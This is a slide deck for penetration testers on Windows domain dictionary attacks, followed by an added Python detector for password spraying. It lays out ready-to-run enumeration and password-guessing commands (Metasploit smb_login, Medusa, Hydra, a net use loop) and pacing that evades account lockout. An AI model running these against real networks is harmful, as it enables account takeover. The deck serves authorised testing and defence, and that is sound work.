Introduction to Windows Dictionary Attacks

  1. Introduction to Windows Dictionary Attacks
     Author: Scott Sutherland

  2. Who am I?
     Scott Sutherland
     • Security Consultant @ NetSPI
     • Over 10 years of consulting experience
     • Security researcher: blogs, white papers, tools, etc.

  3. Presentation Goals
     • Identify the value of dictionary attacks
     • Provide new penetration testers with a safe approach to Windows dictionary attacks
     • Provide security professionals with questions they should be asking their contractors

  4. Before we begin…
     Dictionary Attack
     Brute Force Attack

  5. Why dictionary attacks?
     What are the goals?
     • Identify accounts configured with weak or default passwords – “It’s human nature”
     • Use accounts as entry points during penetration tests
     What’s the impact?
     • Unauthorized access to critical:
       ‒ Systems
       ‒ Applications
       ‒ Data
     • User impersonation

  6. Are There Alternatives?
     Yes. Approaches typically include:
     • Cracking password hashes offline with:
       ‒ Pre-computed hash libraries like Rainbow Tables
       ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper
     • Dumping clear text passwords from interactive sessions with Mimikatz

  7. Will Alternatives be Covered?
     No.

  8. Dictionary Attacks: Process Overview
     Windows Dictionary Attack Process
     1. Identify domains
     2. Enumerate domain controllers
     3. Enumerate domain users
     4. Enumerate domain lockout policy
     5. Create a dictionary
     6. Perform attack

  9. Identify Domains: Methods
     Unauthenticated Methods
     • DHCP information
     • NetBIOS queries
     • DNS queries
     • Sniffing network traffic
     • Review RDP drop-down lists
     Authenticated Methods
     • Review the output of the SET command for “USERDNSDOMAIN”
     • Review the registry for the default domain
  10. Identify Domains: Tools
      Method / Tools / Auth
      • DHCP Info (Auth: No): IPCONFIG
      • NetBIOS Queries (Auth: No): NBTSTAT -A <IP>
      • DNS Queries (Auth: No):
        ‒ nmap -sL <IP Range> -oA output_rdns
        ‒ ./reverseraider -r <IP Range>
        ‒ ./dnswalk victim.com
        ‒ perl <script.pl> -dns <domainname> -threads 5 -file <domainname>-dns.output
      • Sniffing (Auth: No):
        ‒ Wireshark (GUI) + filter for browser traffic
        ‒ Network Miner (GUI)
        ‒ EtherApe (GUI)
      • RDP Drop Down (Auth: No): nmap -sS -PN -p3389 <IP Range>, then visit with an RDP client

  11. Enumerate DCs: Methods
      Unauthenticated Methods
      • DNS queries
      • RPC queries
      • Port scanning
      • NetBIOS scanning
      Authenticated Methods
      • NET GROUP commands
      • LDAP queries

  12. Enumerate DCs: Tools
      Method / Tools / Auth
      • DNS Queries (Auth: No): NSLOOKUP -type=SRV _ldap._tcp.<domain>
      • RPC Queries (Auth: No):
        ‒ NLTEST /DCLIST <domain>
        ‒ FindPDC <domain> <request count>
      • Port Scanning (Auth: No): NMAP -sS -p389,636 -PN <IP Range>
      • NetBIOS Scanning (Auth: No): FOR /F "tokens=*" %i in ('type ips.txt') do NBTSTAT -A %i
      • NET GROUP Command (Auth: Yes): net group "Domain Controllers" /domain
      • LDAP Queries (Auth: Yes & No):
        ‒ LDAP Administrator (GUI tool)
        ‒ Hyena (GUI tool)
        ‒ adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq

  13. Enumerate Domain Users: Methods
      Unauthenticated Methods
      • RPC queries
      • SID brute forcing
      • SNMP queries
      • LDAP queries
      • SharePoint fuzzing
      Authenticated Methods
      • NET USER command
      • WMI commands

  14. Enumerate Domain Users: Tools 1
      Method / Tools / Auth
      • RPC Endpoints (Auth: Yes & No):
        ‒ dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt
        ‒ enum -N <ip>
        ‒ enum -U <ip>
      • SID Brute Forcing (Auth: Yes & No):
        ‒ ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt
        ‒ GetAcct (GUI)
      • SNMP Queries (Auth: Yes & No):
        ‒ ruby c:\metasploit\msf3\msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E
        ‒ MIB Browser (GUI)
        ‒ SNMP Walk

  15. Enumerate Domain Users: Tools 2
      Method / Tools / Auth
      • LDAP Queries (Auth: Yes & No): adfind -b DC=<victim>,DC=<com> -f "objectcategory=user" -gc | grep -i "sAMAccountName:" | gawk -F ":" "{print $2}" | gawk -F " " "{print $1}" | sort > domain_users.txt
      • SharePoint Fuzzing (Auth: Yes & No): Fuzz parameters with Burp to enumerate domain users. Example URL: https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2]
      • NET USERS Command (Auth: Yes): net users /domain > domain_users.txt
      • WMI Commands (Auth: Yes): wmic /user:<user> /password:<password> /node:<IP address> <query> > domain_users.txt
  16. Get Domain Lockout Policy: Methods
      Unauthenticated Methods
      • RPC endpoints
      Authenticated Methods
      • NET ACCOUNTS command
      What does it all mean?
      • Threshold, duration, and window, for example:
        Lockout threshold: 5
        Lockout duration: 15
        Lockout observation window: 15

  17. Get Domain Lockout Policy: Tools
      Method / Tools / Auth
      • RPC Queries (Auth: Yes & No):
        ‒ enum -P <IP Address>
        ‒ dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt
      • NET ACCOUNTS Command (Auth: Yes): NET ACCOUNTS

  18. Create a Dictionary: Methods
      Classics Still Work
      • Blank
      • Username as password
      • password
      Common Formulas = Most Effective
      • <Password><Number>
      • <Companyname><Number>
      • <Season><Year>
      • <Sports team><Number>
      Popular Dictionaries
      • Metasploit dictionaries
      • RockYou
      • FuzzDB
      • John the Ripper

  19. Create a Dictionary: Tools
      Dictionary / URLs / Lists
      • Classics: blank password; username as password; password as password
      • Formulas: <Password><Number>; <Companyname><Number>; <Season><Year>; <Sports team><Number>
      • Your Brain! Think of keywords relative to the target company / geographic location and you’ll get more out of your dictionary attacks!
      • Lists: RockYou; John the Ripper
  20. Perform Dictionary Attack: Rules
      The Rule to Live By: Respect the lockout policy
      • General idea = attempt a few passwords for all of the domain users each round, not 1000 passwords against one user
      • Subtract 2 attempts from the lockout policy. Example: Lockout=5, Attempts=3
      • Wait 5 to 10 minutes beyond the observation window
  21. Perform Dictionary Attack: Tools
      Tools / Commands / OS
      • Medusa (Linux): medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
      • Bruter (Windows): Easy to use GUI; no CLI that I know of.
      • Metasploit smb_login (Windows and Linux): ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\passwords.txt USER_FILE=c:\allusers.txt SMBDomain=. RHOSTS= E
      • Hydra (Windows and Linux): hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb
      • Batch Script (Windows): FOR /F "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<user> %a

  22. Conclusions
      • There is more than one way to do everything!
      • Enumerate all available options
      • It’s easy to lock out accounts – respect the password policy
      • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests
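An added defender-side example, not part of Scott Sutherland's slides: it detects the cadence slide 20 prescribes (a few attempts per account spread across every domain user, staying two short of the threshold, then pausing past the observation window) by counting distinct accounts per source IP inside the lockout observation window from slide 16. The failed-logon rows, account names and IP addresses are constructed; the policy numbers are the slides' own.

```python
# Added example, not from the slides: flag the spray pattern the slides describe
# (a few passwords against every user per round) in failed-logon records. The
# policy values are the slides' own; the rows are constructed stand-ins for
# Windows Security event 4625 records.
from collections import defaultdict
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5                       # slide: Lockout threshold: 5
OBSERVATION_WINDOW = timedelta(minutes=15)  # slide: observation window: 15

EVENTS = [  # constructed sample: (timestamp, account name, source IP)
    ("2024-01-10 09:00:05", "alice", "10.1.1.50"),
    ("2024-01-10 09:00:06", "bob",   "10.1.1.50"),
    ("2024-01-10 09:00:07", "carol", "10.1.1.50"),
    ("2024-01-10 09:00:08", "dave",  "10.1.1.50"),
    ("2024-01-10 09:00:09", "erin",  "10.1.1.50"),
    ("2024-01-10 09:20:05", "alice", "10.1.1.50"),  # next round, past the window
    ("2024-01-10 09:03:00", "alice", "10.1.1.77"),  # one user mistyping
    ("2024-01-10 09:03:30", "alice", "10.1.1.77"),
]

def _max_in_window(times, window):
    """Largest number of timestamps that fall inside one sliding window."""
    times = sorted(times)
    return max(sum(1 for t in times[i:] if t - start <= window)
               for i, start in enumerate(times))

def spray_sources(events, min_accounts=5, window=OBSERVATION_WINDOW):
    """Sources whose failures hit >= min_accounts distinct accounts inside one
    window. Each account stays under the lockout threshold, so per-account
    lockout alerts never fire; counting accounts per source is what catches it."""
    first_fail = defaultdict(dict)           # src -> {account: first failure}
    for ts, acct, src in events:
        t = datetime.fromisoformat(ts)
        first_fail[src][acct] = min(t, first_fail[src].get(acct, t))
    return {src: sorted(accts)
            for src, accts in first_fail.items()
            if _max_in_window(accts.values(), window) >= min_accounts}

def near_lockout(events, window=OBSERVATION_WINDOW, margin=2):
    """Accounts whose failures in one window reach threshold - margin, the
    per-round budget the slides tell testers to stay within."""
    by_acct = defaultdict(list)
    for ts, acct, _ in events:
        by_acct[acct].append(datetime.fromisoformat(ts))
    return sorted(a for a, ts in by_acct.items()
                  if _max_in_window(ts, window) >= LOCKOUT_THRESHOLD - margin)
```

With the constructed rows, 10.1.1.50 is flagged even though no account reaches five failures, and alice is reported as sitting at the threshold-minus-two budget.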